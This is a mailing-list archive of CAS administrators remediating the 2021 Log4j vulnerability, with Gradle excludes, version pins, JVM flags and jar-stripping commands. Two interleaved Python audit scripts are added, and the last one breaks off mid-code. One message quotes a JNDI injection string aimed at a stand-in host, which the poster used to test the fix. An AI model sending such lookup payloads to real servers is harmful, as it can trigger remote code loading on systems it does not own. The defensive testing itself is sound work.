Re: [cas-user] log4j vulnerability remediation

2021-12-31 Thread Baba Ndiaye
Yes new update for cas-overlay-template

On Fri, 31 Dec 2021 at 07:12, Andy Ng wrote:

> And... 2.17.1 is out as well.
>
> On Tuesday, 21 December 2021 at 03:50:00 UTC+8 Pablo Vidaurri wrote:
>
>>
>> 2.17.0 is actually out now
>> On Thursday, December 16, 2021 at 2:27:13 PM UTC-6 Raph C wrote:
>>
>>> Hi,
>>>
>>> You have to exclude log4j* from WEB-INF/lib in the overlay plugin and add
>>> the correct version as a dependency (use 2.16.0 instead; a new CVE appeared on
>>> Tuesday).
>>> Regards,
>>>
>>> On Tue, 14 Dec 2021 at 17:02, apereo_cas_user wrote:
>>>
>>>> We use the cas 6.1.7 overlay template [still in pre-prod] for delegated
>>>> authentication.
>>>> As a temp solution we replaced log4j 2.12.1 with 2.15.0 manually and
>>>> bounced tomcat.
>>>> Is there a way we can exclude 2.12.1 from the build? [I can pull in
>>>> 2.15.0 by adding it in build.gradle, but it conflicts with 2.12.1.] We have issues
>>>> when upgrading to 6.3.7.2.
>>>>
>>>> Thanks
>>>>
>>>> --
>>>> - Website: https://apereo.github.io/cas
>>>> - Gitter Chatroom: https://gitter.im/apereo/cas
>>>> - List Guidelines: https://goo.gl/1VRrw7
>>>> - Contributions: https://goo.gl/mh7qDG
>>>> ---
>>>> You received this message because you are subscribed to the Google
>>>> Groups "CAS Community" group.
>>>> To unsubscribe from this group and stop receiving emails from it, send
>>>> an email to cas-user+u...@apereo.org.
>>>> To view this discussion on the web visit
>>>> https://groups.google.com/a/apereo.org/d/msgid/cas-user/affbd618-e1e6-427f-b333-e00ca54bf1aen%40apereo.org.


To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAFu1ZRukRcZnJHGKtqp4OKU8%3DxV%3DGyROj6SGX3%2BHWx7ExQQKVA%40mail.gmail.com.


Re: [cas-user] log4j vulnerability remediation

2021-12-30 Thread Andy Ng
And... 2.17.1 is out as well.

On Tuesday, 21 December 2021 at 03:50:00 UTC+8 Pablo Vidaurri wrote:

>
> 2.17.0 is actually out now
> On Thursday, December 16, 2021 at 2:27:13 PM UTC-6 Raph C wrote:
>
>> Hi,
>>
>> You have to exclude log4j* from WEB-INF/lib in the overlay plugin and add
>> the correct version as a dependency (use 2.16.0 instead; a new CVE appeared on
>> Tuesday).
>> Regards,
>>
>> On Tue, 14 Dec 2021 at 17:02, apereo_cas_user wrote:
>>
>>> We use the cas 6.1.7 overlay template [still in pre-prod] for delegated
>>> authentication.
>>> As a temp solution we replaced log4j 2.12.1 with 2.15.0 manually and
>>> bounced tomcat.
>>> Is there a way we can exclude 2.12.1 from the build? [I can pull in
>>> 2.15.0 by adding it in build.gradle, but it conflicts with 2.12.1.] We have issues
>>> when upgrading to 6.3.7.2.
>>>
>>> Thanks
>>>

To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/5fb5c6d4-0a05-4f00-a4a1-a1afa89cce21n%40apereo.org.


Re: [cas-user] log4j vulnerability remediation

2021-12-20 Thread Pablo Vidaurri

2.17.0 is actually out now
On Thursday, December 16, 2021 at 2:27:13 PM UTC-6 Raph C wrote:

> Hi,
>
> You have to exclude log4j* from WEB-INF/lib in the overlay plugin and add
> the correct version as a dependency (use 2.16.0 instead; a new CVE appeared on
> Tuesday).
> Regards,
>
> On Tue, 14 Dec 2021 at 17:02, apereo_cas_user wrote:
>
>> We use the cas 6.1.7 overlay template [still in pre-prod] for delegated
>> authentication.
>> As a temp solution we replaced log4j 2.12.1 with 2.15.0 manually and
>> bounced tomcat.
>> Is there a way we can exclude 2.12.1 from the build? [I can pull in
>> 2.15.0 by adding it in build.gradle, but it conflicts with 2.12.1.] We have issues
>> when upgrading to 6.3.7.2.
>>
>> Thanks
>>

To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/d771419d-777f-4afc-b752-48b92620a13en%40apereo.org.


Re: [cas-user] log4j vulnerability remediation

2021-12-16 Thread Raph C
Hi,

You have to exclude log4j* from WEB-INF/lib in the overlay plugin and add
the correct version as a dependency (use 2.16.0 instead; a new CVE appeared on
Tuesday).
Regards,

On Tue, 14 Dec 2021 at 17:02, apereo_cas_user wrote:

> We use the cas 6.1.7 overlay template [still in pre-prod] for delegated
> authentication.
> As a temp solution we replaced log4j 2.12.1 with 2.15.0 manually and
> bounced tomcat.
> Is there a way we can exclude 2.12.1 from the build? [I can pull in
> 2.15.0 by adding it in build.gradle, but it conflicts with 2.12.1.] We have issues
> when upgrading to 6.3.7.2.
>
> Thanks
>

To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAJtMnTFH2iCfbQQMe31WtoJtCgatasTAw4TCZWBUx8tZLirSXg%40mail.gmail.com.


Re: [cas-user] log4j vulnerability remediation

2021-12-14 Thread Joe Manavalan
Thanks @robertoschwald

That worked for me as well

build.gradle
---
dependencies {
    // Pin every Log4j 2 artifact the CAS war ships to the fixed release.
    // ("compile" is the configuration this Gradle version used; Gradle 7+ needs "implementation".)
    compile "org.apache.logging.log4j:log4j-api:2.15.0"
    compile "org.apache.logging.log4j:log4j-core:2.15.0"
    compile "org.apache.logging.log4j:log4j-jcl:2.15.0"
    compile "org.apache.logging.log4j:log4j-jul:2.15.0"
    compile "org.apache.logging.log4j:log4j-web:2.15.0"
    compile "org.apache.logging.log4j:log4j-slf4j18-impl:2.15.0"
}

bootWar {
    entryCompression = ZipEntryCompression.STORED
    overlays {
        cas {
            from "org.apereo.cas:cas-server-webapp${project.appServer}:${casServerVersion}@war"
            provided = false
            // Drop the 2.12.1 jars bundled in the upstream war so that only the
            // versions declared above end up in WEB-INF/lib.
            excludes = ["WEB-INF/lib/log4j-*-2.12.1.jar"]
        }
    }
}

On Tuesday, December 14, 2021 at 10:41:32 AM UTC-6 robertoschwald wrote:

> We had the same problem and we did the following:
>
> 1. Overwrite BOM defined version in gradle.properties
>
> # BOM overwritten versions
> # CVE-2021-44228 critical fix in 2.15.0.
> # 2.16.0 further secures.
> # See https://lists.apache.org/thread/d6v4r6nosxysyq9rvnr779336yf0woz4
> log4j2.version=2.16.0
>
> 2. add the dependencies to build.gradle
> We use a fairly old CAS Server, so we use these deps. Normally you do not
> have to state the ones which have no version; they are taken with the version
> you defined in the log4j2.version variable, but we stated them explicitly so
> one knows which artifacts are affected.
>
> // Log4j2 critical security flaw fixed in 2.15.0
> compile "org.apache.logging.log4j:log4j-api"
> compile "org.apache.logging.log4j:log4j-core"
> compile "org.apache.logging.log4j:log4j-jcl:${project.'log4j2.version'}"
> compile "org.apache.logging.log4j:log4j-slf4j-impl"
> compile "org.apache.logging.log4j:log4j-web:${project.'log4j2.version'}"
>
> 3. Exclude the old dependencies from war-overlay
> This is an important step.
> As you get the dependencies from the original, overlayed war file, you 
> must exclude them in the war task, so only your versions are taken.
>
> war {
>   ...
>   // exclusion list of all dependencies contained in the original cas-WAR for which we use newer versions.
>   // You must exclude all of them, otherwise we get duplicate dependencies in our cas.war !
>   // log4j2 insecure version remove. See above.
>   exclude "WEB-INF/lib/log4j-*-2.12.1.jar"
>   exclude "WEB-INF/lib/jul-to-slf4j-1.7.32.jar"
>   exclude "WEB-INF/lib/slf4j-api-1.7.32.jar"
> }
>
> Hope that helps.
>
>
>
> On 14.12.2021 at 17:25, Jeffrey Ramsay wrote:
>
> Same experience.
>
> On Tue, Dec 14, 2021 at 11:02 AM apereo_cas_user  
> wrote:
>
>> We use the cas 6.1.7 overlay template [still in pre-prod] for delegated
>> authentication.
>> As a temp solution we replaced log4j 2.12.1 with 2.15.0 manually and
>> bounced tomcat.
>> Is there a way we can exclude 2.12.1 from the build? [I can pull in
>> 2.15.0 by adding it in build.gradle, but it conflicts with 2.12.1.] We have issues
>> when upgrading to 6.3.7.2.
>>
>> Thanks
>>
>>
>


Re: [cas-user] log4j vulnerability remediation

2021-12-14 Thread Robert Oschwald
We had the same problem and we did the following:

1. Overwrite BOM defined version in gradle.properties

# BOM overwritten versions
# CVE-2021-44228 critical fix in 2.15.0.
# 2.16.0 further secures.
# See https://lists.apache.org/thread/d6v4r6nosxysyq9rvnr779336yf0woz4
log4j2.version=2.16.0

2. add the dependencies to build.gradle
We use a fairly old CAS Server, so we use these deps. Normally you do not have
to state the ones which have no version; they are taken with the version you defined
in the log4j2.version variable, but we stated them explicitly so one knows which
artifacts are affected.

// Log4j2 critical security flaw fixed in 2.15.0
compile "org.apache.logging.log4j:log4j-api"
compile "org.apache.logging.log4j:log4j-core"
compile "org.apache.logging.log4j:log4j-jcl:${project.'log4j2.version'}"
compile "org.apache.logging.log4j:log4j-slf4j-impl"
compile "org.apache.logging.log4j:log4j-web:${project.'log4j2.version'}"

3. Exclude the old dependencies from war-overlay
This is an important step.
As you get the dependencies from the original, overlayed war file, you must 
exclude them in the war task, so only your versions are taken.

war {
  ...
  // exclusion list of all dependencies contained in the original cas-WAR for which we use newer versions.
  // You must exclude all of them, otherwise we get duplicate dependencies in our cas.war !
  // log4j2 insecure version remove. See above.
  exclude "WEB-INF/lib/log4j-*-2.12.1.jar"
  exclude "WEB-INF/lib/jul-to-slf4j-1.7.32.jar"
  exclude "WEB-INF/lib/slf4j-api-1.7.32.jar"
}

Hope that helps.



> On 14.12.2021 at 17:25, Jeffrey Ramsay wrote:
> 
> Same experience.
> 
> On Tue, Dec 14, 2021 at 11:02 AM apereo_cas_user wrote:
> We use the cas 6.1.7 overlay template [still in pre-prod] for delegated
> authentication.
> As a temp solution we replaced log4j 2.12.1 with 2.15.0 manually and bounced
> tomcat.
> Is there a way we can exclude 2.12.1 from the build? [I can pull in 2.15.0
> by adding it in build.gradle, but it conflicts with 2.12.1.] We have issues when
> upgrading to 6.3.7.2.
> 
> Thanks
> 
> 

To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/A6D22B3F-1993-4D04-A604-59DE522768B6%40gmail.com.


Re: [cas-user] log4j vulnerability remediation

2021-12-14 Thread Jeffrey Ramsay
Same experience.

On Tue, Dec 14, 2021 at 11:02 AM apereo_cas_user wrote:

> We use the cas 6.1.7 overlay template [still in pre-prod] for delegated
> authentication.
> As a temp solution we replaced log4j 2.12.1 with 2.15.0 manually and
> bounced tomcat.
> Is there a way we can exclude 2.12.1 from the build? [I can pull in
> 2.15.0 by adding it in build.gradle, but it conflicts with 2.12.1.] We have issues
> when upgrading to 6.3.7.2.
>
> Thanks
>

To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CA%2BTBYOQ-AecysHAxD0FHEdBnTTHD3wNTa_d1xXcVVRmuC16A5g%40mail.gmail.com.


[cas-user] log4j vulnerability remediation

2021-12-14 Thread apereo_cas_user
We use the cas 6.1.7 overlay template [still in pre-prod] for delegated
authentication.
As a temp solution we replaced log4j 2.12.1 with 2.15.0 manually and
bounced tomcat.
Is there a way we can exclude 2.12.1 from the build? [I can pull in 2.15.0
by adding it in build.gradle, but it conflicts with 2.12.1.] We have issues when
upgrading to 6.3.7.2.

Thanks

To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/affbd618-e1e6-427f-b333-e00ca54bf1aen%40apereo.org.


Re: [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability

2021-12-11 Thread Anders Collstrup
My fix was the following:

CAS 6.1 running on debian 10. All except CAS installed from standard repos.

created this file:
/usr/share/tomcat9/bin/setenv.sh

containing:
JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=True"

After restart of tomcat I could see the following in the log:
10-Dec-2021 18:49:18.681 INFO [main]
org.apache.catalina.startup.VersionLoggerListener.log Command line
argument: -Dlog4j2.formatMsgNoLookups=True

On Fri, Dec 10, 2021 at 9:01 PM King, Robert  wrote:

> Just rolled out this mitigation to our servers, seems to be effective for
> CAS 6.3.x builds.
>
> Our environment for reference:
>
> - Standalone Tomcat
> - OpenJDK
> - CAS and CAS-Management as deployed jars
> - CAS and CAS-Management built from cas-overlay and cas-management-overlay
> repos.
>
> Mitigated by adding “-Dlog4j2.FormatMsgNoLookups=true” into the Tomcat
> startup in systemd tomcat.service file.
>
> *From:* 'Richard Frovarp' via CAS Community 
> *Sent:* Friday, December 10, 2021 3:29 PM
> *To:* cas-user@apereo.org
> *Subject:* [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability
>
>
>
> Maybe? The one that I've seen
>
> https://logging.apache.org/log4j/2.x/security.html
>
>
>
> says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to
> your JVM and not in the config file.
>
>
>
> On 12/10/21 12:55 PM, Mike Osterman wrote:
>
> Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in
> the log4j2.xml config file might do the trick.
>
> I'm guessing we'd do that somewhere here at the top?
>
> /etc/cas/logs
>
> On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <
> cas-user@apereo.org> wrote:
>
> Using a new enough version of the JDK might also alleviate it? The other
> option is to throw the config option at the JDK to stop it from happening.
> That would seem to be easiest.
>
>
>
> On 12/10/21 12:36 PM, King, Robert wrote:
>
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
>
> Has anyone attempted to mitigate this CVE yet?
>
> There seems to be two possible approaches to mitigation:
>
> 1. The sledgehammer approach of removing the JndiLookup.class from the jar
> files:
>
> zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
>
> 2. Rebuild CAS and set “log4jVersion=2.15.0”
>

RE: [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability

2021-12-10 Thread King, Robert
Just rolled out this mitigation to our servers, seems to be effective for CAS 
6.3.x builds.

Our environment for reference:

- Standalone Tomcat
- OpenJDK
- CAS and CAS-Management as deployed jars
- CAS and CAS-Management built from cas-overlay and cas-management-overlay repos.

Mitigated by adding “-Dlog4j2.FormatMsgNoLookups=true” into the Tomcat startup 
in systemd tomcat.service file.


From: 'Richard Frovarp' via CAS Community 
Sent: Friday, December 10, 2021 3:29 PM
To: cas-user@apereo.org
Subject: [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability

Maybe? The one that I've seen
https://logging.apache.org/log4j/2.x/security.html

says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to your 
JVM and not in the config file.

On 12/10/21 12:55 PM, Mike Osterman wrote:
Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in the
log4j2.xml config file might do the trick.

I'm guessing we'd do that somewhere here at the top?

/etc/cas/logs


On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <cas-user@apereo.org> wrote:
Using a new enough version of the JDK might also alleviate it? The other option 
is to throw the config option at the JDK to stop it from happening. That would 
seem to be easiest.

On 12/10/21 12:36 PM, King, Robert wrote:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Has anyone attempted to mitigate this CVE yet?

There seems to be two possible approaches to mitigation:

1. The sledgehammer approach of removing the JndiLookup.class from the jar files:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Rebuild CAS and set “log4jVersion=2.15.0”

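Two things are worth checking on the built cas.war after applying what this thread describes: that the old 2.12.1 jars are really gone (Robert Oschwald's step 3 above, where a missed overlay exclude leaves two copies of log4j-core in WEB-INF/lib), and whether JndiLookup.class is still inside the core jar (the zip -q -d approach quoted just above). The Python below is an added example written for this page, not code from the thread or from the CAS project. It assembles a constructed in-memory WAR (real entry names, dummy bytes) so it runs offline, scans it the way one would scan a real cas.war with the standard zipfile module, and shows the class-removal rewrite. The 2.15.0 threshold is the CVE-2021-44228 fix the thread cites; the follow-up releases it mentions (2.16.0, 2.17.0, 2.17.1) superseded it, so treat it as a floor, not a target. Fixed releases still ship JndiLookup.class with JNDI disabled by default, so the presence of the class alone says nothing above 2.15.0.

```python
"""Inspect a cas.war for Log4j 2 jars: duplicate versions left by a missed overlay
exclude, and log4j-core jars still carrying JndiLookup.class. Added example."""
import io
import re
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# WEB-INF/lib/log4j-core-2.12.1.jar -> artifact "log4j-core", version "2.12.1"
LOG4J_JAR = re.compile(r"^WEB-INF/lib/(log4j-[^/]+)-(\d+(?:\.\d+)+)\.jar$")
FIXED_44228 = (2, 15, 0)  # first release that addressed CVE-2021-44228


def parse_version(text):
    return tuple(int(part) for part in text.split("."))


def make_jar(entry_names):
    """Constructed stand-in for a jar: real entry names, dummy bytes, no bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as jar:
        for name in entry_names:
            jar.writestr(name, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def make_war(libs):
    """libs: {'WEB-INF/lib/<name>.jar': bytes}; nested jars are STORED, as a Spring
    Boot executable war requires (the reason for entryCompression STORED)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as war:
        for path, data in libs.items():
            war.writestr(path, data)
    return buf.getvalue()


def scan_war(war_bytes):
    """Return {artifact: [(version_tuple, has_jndi_lookup), ...]} for WEB-INF/lib."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        for path in war.namelist():
            match = LOG4J_JAR.match(path)
            if not match:
                continue
            with zipfile.ZipFile(io.BytesIO(war.read(path))) as jar:
                has_jndi = JNDI_LOOKUP in jar.namelist()
            found.setdefault(match.group(1), []).append(
                (parse_version(match.group(2)), has_jndi))
    return found


def findings(scan):
    """Problems to act on, as plain strings; an empty list means the build is clean."""
    problems = []
    for artifact, entries in sorted(scan.items()):
        versions = sorted(version for version, _ in entries)
        if len(versions) > 1:
            # Two copies of one artifact: the overlay exclude did not take effect
            # and the class loader may pick either copy.
            problems.append("duplicate %s jars in WEB-INF/lib: %s" % (
                artifact, ", ".join(".".join(map(str, v)) for v in versions)))
        for version, has_jndi in entries:
            # Fixed releases still ship JndiLookup.class (JNDI off by default), so
            # its presence only matters below the fixed version.
            if artifact == "log4j-core" and version < FIXED_44228 and has_jndi:
                problems.append("log4j-core %s still contains JndiLookup.class: "
                                "CVE-2021-44228" % ".".join(map(str, version)))
    return problems


def drop_entry(jar_bytes, entry):
    """Rewrite a jar without one entry (zipfile has no in-place delete)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename != entry:
                dst.writestr(info.filename, src.read(info))
    return out.getvalue()


def strip_jndi_lookup(war_bytes):
    """The `zip -q -d log4j-core-*.jar .../JndiLookup.class` sledgehammer applied
    to every log4j-core jar inside the war; outer entries stay STORED."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as src, zipfile.ZipFile(out, "w", zipfile.ZIP_STORED) as dst:
        for info in src.infolist():
            data = src.read(info)
            match = LOG4J_JAR.match(info.filename)
            if match and match.group(1) == "log4j-core":
                data = drop_entry(data, JNDI_LOOKUP)
            dst.writestr(info.filename, data)
    return out.getvalue()


# Constructed sample: the overlay pulled in 2.16.0 but the exclude was missed, so
# the upstream 2.12.1 jars are still in the war next to the new ones.
SAMPLE_WAR = make_war({
    "WEB-INF/lib/log4j-api-2.12.1.jar": make_jar(["org/apache/logging/log4j/Logger.class"]),
    "WEB-INF/lib/log4j-core-2.12.1.jar": make_jar(["org/apache/logging/log4j/core/Logger.class", JNDI_LOOKUP]),
    "WEB-INF/lib/log4j-api-2.16.0.jar": make_jar(["org/apache/logging/log4j/Logger.class"]),
    "WEB-INF/lib/log4j-core-2.16.0.jar": make_jar(["org/apache/logging/log4j/core/Logger.class", JNDI_LOOKUP]),
})
```

Feed scan_war the bytes of the real artifact from the overlay's build output; a clean result is one jar per Log4j artifact and an empty findings list. Stripping the class is the emergency path only, as is the -Dlog4j2.formatMsgNoLookups=true property used elsewhere in this thread: Apache's security page later listed that property among the discredited mitigations because it does not cover CVE-2021-45046, and a stripped 2.12.1 jar still reports as 2.12.1 to every inventory scanner, so the rebuild with the pinned version remains the fix.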

Re: [cas-user] log4j vulnerability

2021-12-10 Thread Adam Franco
I've rebuilt CAS with log4j 2.15.0 and confirmed that doing so stopped 
outgoing connections when a line like 
${jndi:rmi://www.example.com:80/test}
was submitted in the username field (I used a real hostname rather than 
www.example.com).

We were able to verify this fix with tcpdump on the CAS node as well as 
border-firewall logging.
On Friday, December 10, 2021 at 1:59:00 PM UTC-5 richard.frovarp wrote:

> Maybe? The one that I've seen
> https://logging.apache.org/log4j/2.x/security.html
>
> says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to 
> your JVM and not in the config file.
>
> On 12/10/21 12:55 PM, Mike Osterman wrote:
>
> Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in
> the log4j2.xml config file might do the trick.
>
> I'm guessing we'd do that somewhere here at the top?
>
> /etc/cas/logs
>
> On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <
> cas-...@apereo.org> wrote:
>
>> Using a new enough version of the JDK might also alleviate it? The other 
>> option is to throw the config option at the JDK to stop it from happening. 
>> That would seem to be easiest.
>>
>> On 12/10/21 12:36 PM, King, Robert wrote:
>>
>> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
>>
>>  
>>
>> Has anyone attempted to mitigate this CVE yet?
>>
>>  
>>
>> There seems to be two possible approaches to mitigation:
>>
>>  
>>
>> 1. The sledgehammer approach of removing the JndiLookup.class from the jar
>> files:
>>
>> zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
>>
>> 2. Rebuild CAS and set “log4jVersion=2.15.0”

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/37170aad-78c6-4d0d-97d3-834030f0f6bcn%40apereo.org.


Re: [cas-user] log4j vulnerability

2021-12-10 Thread 'Richard Frovarp' via CAS Community

Maybe? The one that I've seen
https://logging.apache.org/log4j/2.x/security.html

says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to 
your JVM and not in the config file.


On 12/10/21 12:55 PM, Mike Osterman wrote:
Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in 
the log4j2.xml config file might do the trick.


I'm guessing we'd do that somewhere here at the top?




    
        /etc/cas/logs
    
    

On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community 
<cas-user@apereo.org> wrote:


Using a new enough version of the JDK might also alleviate it? The
other option is to throw the config option at the JDK to stop it
from happening. That would seem to be easiest.

On 12/10/21 12:36 PM, King, Robert wrote:


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228


Has anyone attempted to mitigate this CVE yet?

There seem to be two possible approaches to mitigation:

1. The sledgehammer approach of removing the JndiLookup.class from
the jar files:

zip -q -d log4j-core-*.jar
org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Rebuild CAS and set "log4jVersion=2.15.0"

--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS Community" group.

To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/67916862-8f31-e08c-1949-86a97958ba36%40ndsu.edu.


Re: [cas-user] log4j vulnerability

2021-12-10 Thread Mike Osterman
Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in
the log4j2.xml config file might do the trick.

I'm guessing we'd do that somewhere here at the top?





/etc/cas/logs



On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <
cas-user@apereo.org> wrote:

> Using a new enough version of the JDK might also alleviate it? The other
> option is to throw the config option at the JDK to stop it from happening.
> That would seem to be easiest.
>
> On 12/10/21 12:36 PM, King, Robert wrote:
>
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
>
> Has anyone attempted to mitigate this CVE yet?
>
> There seem to be two possible approaches to mitigation:
>
> 1. The sledgehammer approach of removing the JndiLookup.class from the jar
> files:
>
> zip -q -d log4j-core-*.jar
> org/apache/logging/log4j/core/lookup/JndiLookup.class
>
> 2. Rebuild CAS and set "log4jVersion=2.15.0"

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com.


Re: [cas-user] log4j vulnerability

2021-12-10 Thread 'Richard Frovarp' via CAS Community
Using a new enough version of the JDK might also alleviate it? The other 
option is to throw the config option at the JDK to stop it from 
happening. That would seem to be easiest.


On 12/10/21 12:36 PM, King, Robert wrote:


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Has anyone attempted to mitigate this CVE yet?

There seem to be two possible approaches to mitigation:

1. The sledgehammer approach of removing the JndiLookup.class from the 
jar files:

zip -q -d log4j-core-*.jar 
org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Rebuild CAS and set "log4jVersion=2.15.0"

--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS Community" group.

To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu.


[cas-user] log4j vulnerability

2021-12-10 Thread King, Robert
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Has anyone attempted to mitigate this CVE yet?

There seem to be two possible approaches to mitigation:

1. The sledgehammer approach of removing the JndiLookup.class from the jar files:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Rebuild CAS and set "log4jVersion=2.15.0"

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca.
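An added audit script for the mitigation state this thread discusses: Robert's two approaches (deleting JndiLookup.class from log4j-core with `zip -q -d`, or rebuilding with a newer `log4jVersion`) and the `-Dlog4j2.formatMsgNoLookups=true` JVM property Richard points to. This is example code written for this page, not code from the thread, from CAS or from the CAS overlay. It assumes Maven-style jar names (`log4j-core-<version>.jar`, also inside a WAR's `WEB-INF/lib`), takes the JVM property from a command-line string you pass in (for a Tomcat deployment that would be the contents of JAVA_OPTS or CATALINA_OPTS), and rates each jar from a defender's point of view: 2.16.0 removed message lookups upstream, while Apache later documented both 2.15.0 and the formatMsgNoLookups property as incomplete mitigations (CVE-2021-45046), so those only rate as "partial" until the jar itself is upgraded. The sample jars in `demo()` are constructed zip files with a placeholder entry, not real log4j artifacts.

```python
"""Audit a CAS deployment tree for the log4j mitigation state discussed above.

Added example, not code from the thread or from CAS.  For each log4j-core jar
found on disk or inside a WAR's WEB-INF/lib it records:
  1. the artifact version taken from the file name (assumption: Maven naming),
  2. whether org/apache/logging/log4j/core/lookup/JndiLookup.class is present,
  3. whether -Dlog4j2.formatMsgNoLookups=true was passed to the JVM,
and rates the jar "fixed", "mitigated", "partial" or "VULNERABLE".
"""
import io
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JVM_FLAG = "-Dlog4j2.formatMsgNoLookups=true"
VERSION_RE = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")


def parse_version(jar_name):
    """Version tuple from a log4j-core file name, or None for any other jar."""
    m = VERSION_RE.search(jar_name)
    return tuple(int(x) for x in m.groups()) if m else None


def has_jndi_lookup(jar_bytes):
    """True while JndiLookup.class is still inside the jar."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return JNDI_CLASS in zf.namelist()


def strip_jndi_lookup(jar_bytes):
    """Copy the jar without JndiLookup.class: the same effect as `zip -q -d`."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def iter_log4j_core(root):
    """Yield (label, bytes) for every log4j-core jar under root, including WARs."""
    for p in sorted(Path(root).rglob("*")):
        if p.suffix == ".jar" and parse_version(p.name):
            yield p.name, p.read_bytes()
        elif p.suffix == ".war":
            with zipfile.ZipFile(p) as war:
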